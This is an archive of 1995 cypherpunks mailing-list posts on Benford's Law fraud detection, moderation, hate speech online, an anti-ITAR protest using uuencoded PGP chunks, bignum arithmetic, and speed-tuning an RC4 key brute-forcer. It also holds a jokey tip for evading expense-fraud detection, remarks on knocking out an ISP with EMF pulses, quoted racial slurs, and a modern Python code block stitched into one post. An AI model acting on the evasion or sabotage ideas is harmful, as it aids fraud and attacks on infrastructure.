On Tue, 11 Jul 1995 hardin@cyberspace.com wrote:

> John Young posted:
> 
> >    He's Got Their Number: Scholar Uses Math to Foil Financial
> >    Fraud
> > 
> prices are anything but random. A very heavy concentration of eights (8) &
> nines (9), apparently this company is more into $508.98 (color inkjet printer)
> & $38.98 (well known game s/w) than the old late night TV standby of
> "JUST $19.99!". Of course, this is because of excessively documented
> ad nauseam human psychological tendencies that salescritters, who set at
> least the lsd's of price, have been aware of for millennia. I'd bet, that
> 5(five), 8(eight), & 9(nine) are significantly more represented across
> the board in prices (& thus in amounts for checks & tax write offs)
> than their random distribution by Benford's Law or more well known tests
> for randomness would suggest. Has Mr. Negrini factored this into his program?
> I guess the lesson is do a few pgp make__random's & convert a few of the
> hex numbers to dec digits for the lsd's the next time one does creative expense
> reporting.

check amounts will also include any relevant sales tax thus skewing the 
distribution in some fashion.


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER ME for my pgp public key ** CRYPTO FOR THE MASSES!
zifi is a 486 DX4-100 running LINUX 1.2.10, send me all of your RAM now!


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMALPYk3Qo/lG0AH5AQE5PAP/fKnoVXL4SiCR5yv0NK0lUcdxW30q3NOL
ZSg+CnDWdW4QEbTGe6yi8mxcAQRQuxXwikL1qtfFrYgxhEN2nTiD2TrAuzRUbBOJ
c5X5ieC2drPUpITRUI6NvQA9H7IO7FRzQXH46RLosYpN4zy6EfzskbTZM/Zbj3cU
Wg7XHHFZcUo=
=+upl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael James Gebis <mjg51721@uxa.cso.uiuc.edu>
Date: Tue, 11 Jul 95 11:46:09 PDT
To: cypherpunks@toad.com
Subject: A more sophisticated form of moderation.
Message-ID: <199507111845.AA16926@uxa.cso.uiuc.edu>
MIME-Version: 1.0
Content-Type: text/plain


With all the recent traffic about if moderation is the future of the net,
it seems like an appropriate idea to get some brainstorming on some
better forms of moderation.

Specifically, I was thinking along the lines of a newsgroup where only
selected individuals are able to post, but anybody who wants to can read
the group.  However, the "selected individuals" could fall into several
categories.

You could have one or very few "selected individuals" and the newsgroup
would work almost exactly like the current moderated groups.

You could have many "selected individuals" who may have been selected by
proving that they read a FAQ or some other minimal criteria, which could
theoretically cut down on newbie fever.

You could have several dozen "selected individuals" who are selected by
some means (a committee?  a vote?  a "trusted individual who selects
more individuals") and have an unrestricted talk between these
individuals.  This way, you have a newsgroup where these experts can
discuss topics in an unrestricted way.  I'm thinking along the lines of
the "boards" in _Ender's Game_, where a newsgroup is somewhat similar to
a newspaper.  Once the reporters get hired, they have a lot of freedom
on what they can report about.  

There are a lot of details to be worked out, including:
1) Can such a system work?  Are there protocols which can guarantee
authentication on a large distributed system like news?  I'm assuming
that there would have to be some sort of cryptographic authentication to
prevent wide-scale abuse.

2) Is such a system desirable?  Is the current "anybody can post
anywhere if they know how" system better?  Which one promotes cypherpunk
goals more?  Can I anonymously prove that I am a "selected individual"?

Remember, I'm considering this a brainstorming session, so I'd like to
hear any comments you may have.

-- 
Mike Gebis  m-gebis@uiuc.edu    Mean people suck.
http://www.uiuc.edu/ph/www/m-gebis/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Tue, 11 Jul 95 12:50:48 PDT
To: Al Thompson <alt@iquest.net>
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <m0sVh4K-000BSsC@dorite1.iquest.net>
Message-ID: <Pine.3.89.9507111300.B32568-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 11 Jul 1995, Al Thompson wrote:

> At 10:44 AM 7/11/95 -0400, Perry E. Metzger wrote:
> >
> >Brad Dolan writes:
> >> REGULATING THE INTERNET
> >> Shortly after the Communications Decency Act came before the U.S. Senate,
> >> Canada's Parliament passed a resolution unanimously committing legislators
> >> to get tough with on-line hate-mongering.  The Simon Weisenthal Centre in
> >> Toronto sent a strongly worded report to federal regulator the CRTC calling
> >> for strict regulation of the Internet.  (Montreal Gazette 7/7/95 B3)
> >
> >I'm happy to see Nazism fought with fascism.
> >
> >.pm
>   
> You mean alleged nazism fought with obvious fascism.
>  
> I've never seen any actual nazism on the net anywhere, but this "strict 
> regulation" tactic is obviously fascist in nature.
>  
> In fact, the only religious-based hate speech I've ever seen on the net is from
> someone named "windgate" or something who hates Christians and Christianity,
> and 
> is more than happy to write about his hatred.  He hangs out in some of the 
> 'alt.politics' groups.

You oughta go out and borrow someone's shortwave radio or ham HF radio. 
Between 3900 and 3900 KHz every evening, a bunch of guys in the south
(Texas, New Mexico, Arkansas, Louisiana) get on the air and talk about the
"goddamn niggers, jews, and fags that are ruining this country."  All
kinds of folks (meaning non-WASPs, of course) are targeted for this kind
of spew.  Words like "motherfucker" are often used, especially against
"niggers".  The speakers rail against "white women with goddamn niggers",
and any other non-WASP who happens to arouse their ire. 

Quite entertaining if you enjoy that sort of thing.  Stomach-turning if
you don't.  Call signs, times and frequencies heard upon request. 

This sort of thing has been going on for years.  A few years back, the FCC
attempted to go after a couple of idiots on one of the local LA area 2m
repeaters who were spewing all kinds of filth out onto the air waves.  The
district court said, naaah, that's free speech. 

So, if the idiots in Congress want to go after this sort of thing, they
oughta go after the few hams that are ruining the hobby for the rest of
us. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Tue, 11 Jul 95 11:29:11 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <199507111828.AA08553@bear-gate.bear.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@imsi.com> said:
 
> Mark Contois writes:
> > Would that this were so.  There seems to be a burgeoning number of web
> > sites spouting neo- (and not-so-neo-) Nazi disinfo.  Check out
> > 
> > 	http://204.181.176.4/stormfront/
> > 
> > and some of the links provided therein.
> 
> 204.181.176.4 is "stormfront.wat.com".
> 
> I suspect that something is amiss (i.e. faked) about the following,
> but wat.com shows up as

[etc.]

That may be (I wouldn't be surprised if they registered their
site with an innocent-sounding name to avoid trouble), but I
know that those guys are definitely on the net.  I've got
their URL at home and I take a look at their stuff now and
then, just to keep abreast of what those half-wits are up to.
There are at least a few bona fide Nazi/White Power sites out
there.

   --Dave.
--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or 
agreement or any information about any transaction, customer account or account 
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lyle Seaman <lws+@transarc.com>
Date: Tue, 11 Jul 95 12:06:57 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <9507111658.AA06104@elysion.iaks.ira.uka.de>
Message-ID: <wk0gTfuSMUw801MqNL@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


danisch@ira.uka.de (Hadmut Danisch) writes:
> There are certain nazi pages in America. They were showing them in
> a german tv magazine some time ago, but they didn't tell the URLs.
> The URL field in the Mosaic window was painted over.

Oh dear.  There are certain smut pages in Germany.  They were showing
them on TV recently, but I couldn't quite catch the URL.  I can see it
now -- the US government censors the net to keep out the Germans (but
the tourists can still come -- hey, at an average of $80K/year annual
income, they're welcome to go shopping in New York, though if they
want to change clothes on the beach they have to do *that* in
California, Florida is right out, eh Lawton?) and the Germans censor
the net to keep out the Americans.   Oh dear. 

--
Lyle		Transarc		707 Grant Street
412 338 4474	The Gulf Tower		Pittsburgh 15219





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Tue, 11 Jul 95 13:30:59 PDT
To: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <m0sVlwb-000BVbC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 7/11/95 +0100, Ed Carp [khijol Sysadmin] wrote:

>You oughta go out and borrow someone's shortwave radio or ham HF radio. 
>Between 3900 and 3900 KHz every evening, a bunch of guys in the south
>(Texas, New Mexico, Arkansas, Louisiana) get on the air and talk about the
>"goddamn niggers, jews, and fags that are ruining this country."  All
>kinds of folks (meaning non-WASPs, of course) are targeted for this kind
>of spew.  Words like "motherfucker" are often used, especially against
>"niggers".  The speakers rail against "white women with goddamn niggers",
>and any other non-WASP who happens to arouse their ire. 
>
>Quite entertaining if you enjoy that sort of thing.  Stomach-turning if
>you don't.  Call signs, times and frequencies heard upon request. 
  
I don't enjoy it, and don't particularly care to hear it - HOWEVER, I don't
see that they are harming anyone (I don't count "hurt feelings" as "harm"), 
any more than Malcolm X did when he called all white people "the devil," 
or when the militant Muslims do when they call all non-Muslims "heathens" 
or "the infidel" who should be killed.  (or any more than wingate does 
when he says all non-Jews should be done away with).  They are simply 
trying to "sell" their views by exposing their views.  
 
If they want to think that, and if they want to say that, then that is their 
business.  I'm free to listen, or to avoid listening.  I can avoid their 
newsgroups, or turn off my radio.  That doesn't mean I have to like them, or
be nice to them - I am just as free to ridicule their views, and I won't care 
if I hurt their feelings.
 
If this sort of speech is regulated however, I will no longer have that 
choice.  


If I ask the government to prevent them from speaking their views,
then only *I* am free to speak mine, so who is the victim?
  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Tue, 11 Jul 95 14:40:03 PDT
To: "Patrick Finerty" <zinc@zifi.genetics.utah.edu>
Subject: Re: Num Rat
Message-ID: <9507112126.AA0326@localhost>
MIME-Version: 1.0
Content-Type: text/plain





//--- forwarded letter -------------------------------------------------------
> MIME-Version: 1.0
> Date: Tue, 11 Jul 95 13:22:33 -0600
> From: "zinc" <zinc@zifi.genetics.utah.edu>
> To: hardin@cyberspace.com
> Cc: cypherpunks@toad.com
> Subject: Re: Num Rat

Pat Finerty <zinc@zifi.genetics.utah.edu> wrote:
 
> On Tue, 11 Jul 1995 hardin@cyberspace.com wrote:
> 
> > John Young posted:
> > 
> > >    He's Got Their Number: Scholar Uses Math to Foil Financial
> > >    Fraud
> > > 
[snip]
> > I'd bet, that
> > 5(five), 8(eight), & 9(nine) are significantly more represented across
> > the board in prices (& thus in amounts for checks & tax write offs)
> > than their random distribution by Benford's Law or more well known tests
> > for randomness would suggest.
[snip]
> 
> check amounts will also include any relevant sales tax thus skewing the 
> distribution in some fashion.
> 
> 
> patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
> U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
[snip]

Yes, and some vendors will be in state (sales tax) & some out of state (no
sales tax). Furthermore, if the vendor is in state but in a different locale,
there will probably be some difference in sales tax rates as rates within
states are usually based on vendor location. Also some types of purchases
for some types of businesses/organizations/entities have various sales tax
exemptions or surcharges, again all of which varies by state & locality.
ALL of these factors will skew the distribution, eg. sales tax is usually
*.00% or *.25%, *.50%, *.75% etc. so a cursory look shows that 0 & 5 will
be over represented due to this factor.

tjh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Tue, 11 Jul 95 13:26:13 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Down with ITAR - Have YOU exported PGP today? (fwd)
In-Reply-To: <12883.9507112010@exe.dcs.exeter.ac.uk>
Message-ID: <199507112023.QAA19240@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| This is a forward of something I just cross-posted to alt.security.pgp,
| and talk.politics.crypto.  Civil disobedience via illegal .sigs.

	Just to pick a nit, the sig is not illegal.  The ITAR prior
restraints on free speech are.

Adam

(Proud owner of part 001. Get yours today!)

-- 
"It is seldom that liberty          I Support The Phil
of any kind is lost all at     Zimmermann legal defense fund
once."               -Hume    http://www.netresponse.com/zldf


------------------ PGP.ZIP Part [001/713] -------------------
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
M:A$[K+5(K:O5BE405ZE:1"3?UTW`:K_]\/G\?O_^?CX>3^_-S;GGO,^\`^@W
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hardin@cyberspace.com
Date: Tue, 11 Jul 95 15:14:24 PDT
To: "Adam Back" <aba@atlas.ex.ac.uk>
Subject: PGP Anti- ITAR sig
Message-ID: <9507112213.AA0351@PPP53-139.cyberspace.com>
MIME-Version: 1.0
Content-Type: text/plain


Great Idea, Adam!

I am #5, who is #6 ;-)

tjh "T. J. Hardin" <hardin@cyberspace.com>

This is 1/713 of PGP262i DOS Executable Zipfile UUE'd
Violate the Un-Constitutional ITAR Today!
Get YOUR chunk @ web site below.

------------------ PGP.ZIP Part [005/713] -------------------
M@UIXP9EW\".^Q0XL1SO8"^*_O:U-=H(P&2,1A6YHB?KP@@H2/)$+P@-<PX_(
MPTGLPBHDHSW<(,<O,D$XB'2TA`HQ4D'H@R#<)[Z3*D$P80%N*8D1:Q6"T`\J
M/*/<G_$-/L9&%#L)P@HD82`ZHPG4$%#L*`A7D8M#F(/>"($GRAT$8246(Q:3
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Allen Robinson <sebaygo@intellinet.com>
Date: Tue, 11 Jul 95 15:19:33 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Stormfront (was Re: FW: Edupage 7/9/95 (fwd))
In-Reply-To: <9507111744.AA09457@snark.imsi.com>
Message-ID: <Pine.3.89.9507111731.B24086-0100000@sibyl.intellinet.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 11 Jul 1995, Perry E. Metzger wrote:

> Mark Contois writes:
>  
> > 	http://204.181.176.4/stormfront/
> > 
> > and some of the links provided therein.
> 
> 204.181.176.4 is "stormfront.wat.com".
> 
> I suspect that something is amiss (i.e. faked) about the following,
> but wat.com shows up as
> 
> Wongs Advanced Technologies (WAT-DOM)
>    3221 Danny Pk
>    Metairie, LA 70002
> 
>    Domain Name: WAT.COM

<snip>

I've seen the URL for the Stormfront White Nationalist Resource
Page listed at least three different ways.  I've never tried to
visit the site, but here are the three variations with the most
recent one I've seen listed last.

     http://www.accesscom.net/stormfront/


     http://www.stormfront.wat.com/stormfront/
          or
     http://stormfront.wat.com/stormfront/
          (my notes are kind of scrambled)


     htttp://www.stormfront.org/stormfront/


AR

_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
"They that can give up essential liberty to  :
purchase a little temporary safety, deserve  :         Allen Robinson
neither liberty nor safety."                 : sebaygo@intellinet.com
 - Benjamin Franklin, 1759                   :
PGP public key AD022AA9 fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A
available via major keyservers
             




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 11 Jul 95 18:42:01 PDT
To: Ray Cromwell <jim@acm.org
Subject: Re: Moby ints [Re: Num Rat]
Message-ID: <199507120139.SAA07236@shell1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:31 PM 7/11/95 -0400, Ray Cromwell wrote:
> However, it's only worthwhile for large
> numbers (>512 bits). At n=512, if your bigints are stored as polynomials
> with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64
> (so the FFT method and the Karatsuba method are equivalent for numbers
> of that size)

I conjecture that the constant factor is rather smaller for the 
Karatsuba method, so the turnover should be somewhat higher than
512 bits.

Does anyone have any real experimental data on this question?

I assume Schonhage has real experimental data?
--
  ------------------------------------------------------------------
We have the right to defend ourselves	|  http://www.jim.com/jamesd/
and our property, because of the kind	|
of animals that we are. True law	|  James A. Donald
derives from this right, not from the	|
arbitrary power of the omnipotent state.|  jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rfreeman@netaxs.com (Richard Freeman)
Date: Tue, 11 Jul 95 16:12:14 PDT
To: cypherpunks@toad.com
Subject: Re: Don't trust the net too much
Message-ID: <199507112312.TAA19079@access.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> wrote:

>	I hate to join any thread which talks about blowing up rooms
>and killing security guards, but I'll point out that for a few
>hundred dollars worth of transmitter parts, you can cause transient
>failures with EMF pulse weapons, and for a bit more, you can fry all
>the electronics, then drive away before they have any idea that their
>company has been destroyed.
>
>	Killing people is a stupid way to accomplish things.

I would have to agree, and since this whole thread seems to be one of those 
conspiracy things, it is completely unnecessary to cause much at all in the 
way of physical damage.  No matter who rents the T1 lines and other forms of 
communication that unite an ISP with the rest of the world, sooner or later 
they have to enter some sort of communications node.  This could be a 
satellite or some huge telephone routing center, or any number of things.  
If the government wanted you shut down, all they have to do is find one of 
these things for each redundant line to an ISP and cut them all 
simultaneously.  I am sure a court order could be obtained very quickly to 
arrange such a thing, and even this may not be necessary.  I read in some 
magazine about ten years ago that all US-launched communications satellites 
contain software that allows the government to ascertain direct control over 
their functioning.  The purpose stated was that in the event of war the US 
is highly dependent on commercial satellites for non-military communications 
and can not afford to have the Soviets (or whatever foreign power) trying to 
reprogram our satellites utilizing security loopholes on the part of the 
owning company.  In any case, unless the ISP is actually expecting some 
terrorist group to attack their center and has taken deliberate steps to 
protect themselves (an absurdly expensive proposition for just about anyone 
except the military), I doubt there is much that could prevent even a 
private citizen from taking them out, let alone a well-organized group.
-----------------------------------------------------------------
Richard T. Freeman <rfreeman@netaxs.com> - finger for pgp key
3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 
http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 11 Jul 95 16:32:29 PDT
To: jim@acm.org
Subject: Re: Moby ints [Re: Num Rat]
In-Reply-To: <199507111851.LAA18222@mycroft.rand.org>
Message-ID: <199507112331.TAA12573@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



The state of the art in multiprecision integer arithmetic is Scho"nhage.
Schonhage invented the all-integer Fast-Fourier-Transform based 
big-int multiplication method. An n-bit number can be multiplied in O(n ln n) 
operations. This is a big improvement over the Karatsuba method which is
O(n^1.5) and the classical method O(n^2). Surprisingly, the constant
factor isn't that large. This can be combined with modmult techniques
for fast modexp routines. However, it's only worthwhile for large
numbers (>512 bits). At n=512, if your bigints are stored as polynomials
with a 32-bit radix, then N=512/32=16. 16^1.5 = 64, 16 * lg(16) = 64
(so the FFT method and the Karatsuba method are equivalent for numbers
of that size)

If you are dealing with 2048 or 4096 bit keys, it starts to look attractive.


Schonhage published a book in the last year, the result of more than 10 
years of research into this area. It's hard to get a hold of though, you
have to order it from Germany.

95-133299: Schonhage, Arnold.  Fast algorithms : a multitape Turing
     machine implementation /  Mannheim : B.I. Wissenschaftsverlag, 
     c1994.  x,
     297 p. : ill. ; 25 cm.
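
Added example, not code from this post or the reply to it: a count of single-limb (32x32-bit) multiplications for classical and Karatsuba multiplication at the sizes discussed above, 16 limbs for 512-bit operands and 128 limbs for 4096-bit ones. It counts multiplies only, not the extra additions Karatsuba performs, and does not implement the FFT method; the function names, the threshold parameter and the seed are this example's own.

```python
import random

LIMB_BITS = 32
LIMB_MASK = (1 << LIMB_BITS) - 1


def to_limbs(x, limbs):
    """Split a non-negative integer into little-endian 32-bit limbs."""
    return [(x >> (LIMB_BITS * i)) & LIMB_MASK for i in range(limbs)]


def from_limbs(limb_list):
    """Reassemble an integer from little-endian 32-bit limbs."""
    return sum(limb << (LIMB_BITS * i) for i, limb in enumerate(limb_list))


def schoolbook(a, b, counter):
    """Classical O(N^2) multiplication of two limb lists.
    counter[0] is incremented once per limb-by-limb multiply."""
    out = [0] * (len(a) + len(b))
    for i, ai in enumerate(a):
        carry = 0
        for j, bj in enumerate(b):
            counter[0] += 1
            t = out[i + j] + ai * bj + carry
            out[i + j] = t & LIMB_MASK
            carry = t >> LIMB_BITS
        out[i + len(b)] = carry
    return out


def karatsuba(a, b, limbs, counter, threshold=1):
    """Karatsuba multiplication of a, b < 2**(32*limbs), limbs a power of two.
    Python integers stand in for limb arrays; every split is on a limb
    boundary. At or below `threshold` limbs it falls back to schoolbook."""
    if limbs <= threshold:
        return from_limbs(schoolbook(to_limbs(a, limbs), to_limbs(b, limbs), counter))
    half = limbs // 2
    shift = LIMB_BITS * half
    mask = (1 << shift) - 1
    a0, a1 = a & mask, a >> shift
    b0, b1 = b & mask, b >> shift
    z0 = karatsuba(a0, b0, half, counter, threshold)
    z2 = karatsuba(a1, b1, half, counter, threshold)
    # Subtractive variant: |a0 - a1| and |b0 - b1| still fit in `half` limbs,
    # so the third product is the same size as the other two.
    da, db = a0 - a1, b0 - b1
    sign = -1 if (da < 0) != (db < 0) else 1
    zm = karatsuba(abs(da), abs(db), half, counter, threshold)
    z1 = z0 + z2 - sign * zm          # equals a0*b1 + a1*b0
    return (z2 << (2 * shift)) + (z1 << shift) + z0


def multiply_counts(bits, threshold=1, seed=1995):
    """Multiply two seeded pseudo-random `bits`-bit operands both ways, check
    both products against Python's own multiplication, and return
    (schoolbook limb multiplies, Karatsuba limb multiplies)."""
    rng = random.Random(seed)
    a, b = rng.getrandbits(bits), rng.getrandbits(bits)
    limbs = bits // LIMB_BITS
    sb, ka = [0], [0]
    p_school = from_limbs(schoolbook(to_limbs(a, limbs), to_limbs(b, limbs), sb))
    p_kara = karatsuba(a, b, limbs, ka, threshold)
    if not (p_school == p_kara == a * b):
        raise ValueError("products disagree")
    return sb[0], ka[0]


if __name__ == "__main__":
    for bits in (512, 2048, 4096):
        school, kara = multiply_counts(bits)
        print("%4d bits: schoolbook %5d, Karatsuba %4d limb multiplies"
              % (bits, school, kara))
    print("512 bits, schoolbook below 4 limbs:", multiply_counts(512, threshold=4))
```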

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Tue, 11 Jul 95 17:35:20 PDT
To: cypherpunks@toad.com
Subject: proxy down?
Message-ID: <199507120035.TAA28618@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



Recent attempts to use the AOL proxy service have failed (it
used to work perfectly). Anybody else notice this?

Is anybody running a proxy2proxy setup?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Tue, 11 Jul 95 17:41:22 PDT
To: tcmay@sensemedia.net
Subject: My Experience with Moderated Lists and Groups
In-Reply-To: <ac272c6d0d02100462fc@[205.199.118.202]>
Message-ID: <199507120037.AA29650@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


(Forgive me if you've seen this twice... I got disconnected
the first time).

   From: tcmay@sensemedia.net (Timothy C. May)
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk


   I've been on several moderated mailing lists. There are those who moderate
   very lightly, moderately, and heavily.

I guess the first uses regular water as the moderator, and the latter
some sort of deuterated water. My nuclear physics is a little rusty,
though, so I have to ask: does the "moderately" moderated system use
liquid sodium?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Tue, 11 Jul 95 20:39:13 PDT
To: Michael James Gebis <cypherpunks@toad.com
Subject: Re: A more sophisticated form of moderation.
Message-ID: <199507120337.UAA03191@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:45 PM 7/11/95 -0500, Michael James Gebis wrote:
>Specifically, I was thinking along the lines of a newsgroup where only
>selected individuals are able to post, but anybody who wants to can read
>the group.  However, the "selected individuals" could fall into several
>categories.

Not hard to implement things like this.  With the current non-cryptoized
moderation system, anybody can post to a moderated group by putting an
"Approved:" header line on their article.  And articles can be cancelled by
anyone who wants to forge a cancel, so articles with forged approvals can
be cancelmoosed away if people want.  You could set up a cancelbot that trashes
any article that doesn't have the magic words from the FAQ
        Approved: Squeamish Ossifrage
in the header, or doesn't have the right digital signature in the approvals,
where you've only given the keys to the Moderation Cabal.

Or, for a system where mail has to go to a moderator first, similar to the
current mail-to-moderator posting method, you could set up a mail-pool for
the moderator's address, that sends each article out to 1..N of the moderators
(e.g. to whoever's on duty today, or everybody, or a random k of the
moderators for load-sharing), who could then post them.

If you want a mailing-list approach, they're easier - just send your mailing
list through procmail on the mailhost, and set it up to accept/reject/etc.
whoever your list policy wants.

If somebody comes out with D News, the crypto-cancel-based system,
it can use a digital signature system like RIPEM-SIG (which is exportable)
or some equivalent we can build out of PGP after the PGP 3.0 toolkit
becomes available.

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 11 Jul 95 13:10:28 PDT
To: cypherpunks@toad.com
Subject: Down with ITAR - Have YOU exported PGP today? (fwd)
Message-ID: <12883.9507112010@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



This is a forward of something I just cross-posted to alt.security.pgp,
and talk.politics.crypto.  Civil disobedience via illegal .sigs.

Adam

======================================================================
From: aba@dcs.ex.ac.uk
Newsgroups: alt.security.pgp,talk.politics.crypto
Date: Tue, 11 Jul 95 21:03:53 +0100
Subject: Down with ITAR - Have YOU exported PGP today?
Distribution: world


You all know about the ridiculous US regulation called ITAR and how it
applies to crypto software in the US, well here's a fun and relatively
safe (YMMV) way for you to export PGP in protest.

It is just a token effort, and of 0 practical significance, but the
idea is that you just post 3 lines of the uuencoded zipped DOS PGP
executable in place of your usual sig in protest.  If they lock you up
for 3 uuencoded lines which came off a European ftp site and European
web page, then well they are stupid.  More to the point it would make
them (the US state department and the NSA) look stupid.

Take a look at this web page:

	http://dcs.ex.ac.uk/~aba/export/

it will dole out uuencoded parts of PGP.EXE (the DOS binary for
pgp2.6.2i, the international version of PGP, as is available from
myriads of non-US ftp sites).

See my sig for a sample, the first in a long stream hopefully,

And remember, say NO to key escrow :-)

Adam
--
------------------ PGP.ZIP Part [000/713] -------------------
begin 644 pgp.zip
M4$L#!!0````(`">9ZQX3(*,_DG8!`-JF`P`'````4$=0+D581>S;=UQ3U__X
M\9M!$E8,TT@PJ$10$1=*41%WW`KX$=Q[M5KK`&R%(HH+(T.M"S>NME8K=31N
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 11 Jul 95 20:16:51 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, Saturday, 7/15, 2 pm
Message-ID: <VkzAwkkAsW0J084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


Once again, we'll congregate in the food court at the Tivoli,
adjacent to the Auraria campus, and possibly wander elsewhere.
We'll probably get updates on the David Triska and New Order
prosecutions, which have interesting 1st and 4th Amendment
ramifications, but there's no specific agenda.  Send email for
directions, etc.

Oh yeah, this goes out to "Louie da Misnamed" Freeh and the
Overseers of Freehdom, for their unceasing vigilance regarding
the transnational dissemination of Politically Incorrect Bits:

------------------ PGP.ZIP Part [006/713] -------------------
MPTGLPBHDHSW<(,<O,D$XB'2TA`HQ4D'H@R#<)[Z3*D$P80%N*8D1:Q6"T`\J
M/*/<G_$-/L9&%#L)P@HD82`ZHPG4$%#L*`A7D8M#F(/>"($GRAT$8246(Q:3
M$0`]G'"*AMF#]4C$1,S5"$(O!.%!+4$XAV/8@*7PAP>>J`6A$&>Q%W/1#,Z0
-------------------------------------------------------------

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Date: Tue, 11 Jul 95 18:48:06 PDT
To: cypherpunks@toad.com
Subject: Re: Speedup of bruterc4.c
In-Reply-To: <9507111715.AA20916@netmail2.microsoft.com>
Message-ID: <4k0ma8K00iWS06o=cO@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


For linux boxes (or perhaps 486 and pentium machines in general), try
adding the flag -funroll-all-loops to the compile line.

    gcc -O2 -funroll-all-loops -m486 -o brute bruterc4.c


Here are my results on a Linux 486/33
Original code (Adam+Tatu)                               : 5405 keys/sec

Original code with -funroll-all-loops                   : 5991 keys/sec

Original code with Russell's changes                
and a couple of my own and -funroll-all-loops           : 6393 keys/sec



Here are the changes I made:

If we assume that the length of the cyphertext and known text is less
than 256 bytes, then the following works.  This gives you a whopping 40
additional keys/sec.

---------------------------------------------------------------------------
